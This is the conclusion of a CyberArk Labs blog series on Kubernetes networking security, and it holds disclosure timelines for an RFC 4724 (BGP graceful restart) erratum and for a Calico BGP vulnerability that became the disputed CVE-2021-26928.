In the first part of this blog series, we dove deep into Kubernetes networking. Now, at the conclusion of this series, it is important for us to mention that technology is always advancing, and so are attackers’ techniques and tactics. We are now witnessing a significant increase in the use of eBPF technology to implement network policies in containerized environments. It’s only a matter of time before attackers also find ways to exploit this to their advantage. Together with you, we will work to identify such advanced techniques faster and to help block and prevent these attacks in the future.
Disclosure Timeline – RFC 4724
June 23, 2020 – RFC 4724 security issue reported to IETF (Internet Engineering Task Force)
June 25, 2020 – IETF acknowledged the security issue and suggested submitting an RFC erratum
June 29, 2020 – CyberArk Labs submitted an erratum for RFC 4724, “Graceful Restart Mechanism for BGP”
July 21, 2020 – The erratum was accepted with “Held for Document Update” status
CyberArk Labs would like to thank the IETF for their great help and patience in the coordination process.
Disclosure Timeline – Tigera
June 15, 2020 – Vulnerability reported to Tigera by CyberArk Labs
June 17, 2020 – In its initial response, Tigera asked for further clarification
July 14, 2020 – Tigera reproduced and acknowledged the vulnerability
Oct. 14, 2020 – Tigera issued a fix in Calico v3.16.3 which allows the user to add a BGP password to their BGP Peers
Oct. 15, 2020 – CyberArk Labs asked Tigera about issuing a CVE
Oct. 16, 2020 – Tigera responded that they don’t plan to issue a CVE, as they deem this a flaw in the BGP protocol behavior
Oct. 19 – Nov. 4, 2020 – Continued communication, in which we ended up disagreeing about the nature of the vulnerability
Nov. 4, 2020 – CyberArk Labs submitted a CVE request to MITRE, the root CNA
Dec. 19, 2020 – MITRE informed us that they would reach out to Tigera
Dec. 28, 2020 – MITRE informed us that Tigera considered the vulnerability to lie within the BIRD routing daemon component
Dec. 28, 2020 – CyberArk Labs responded to MITRE, pointing out that we believe the issue is caused by Tigera’s design, which did not allow Calico Project users to secure their BGP sessions (noting that the separate BIRD daemon component does allow it)
Feb. 15, 2021 – MITRE issued the Disputed CVE-2021-26928
CyberArk Labs would like to thank the MITRE CVE Assignment Team for their great help and patience in the coordination process.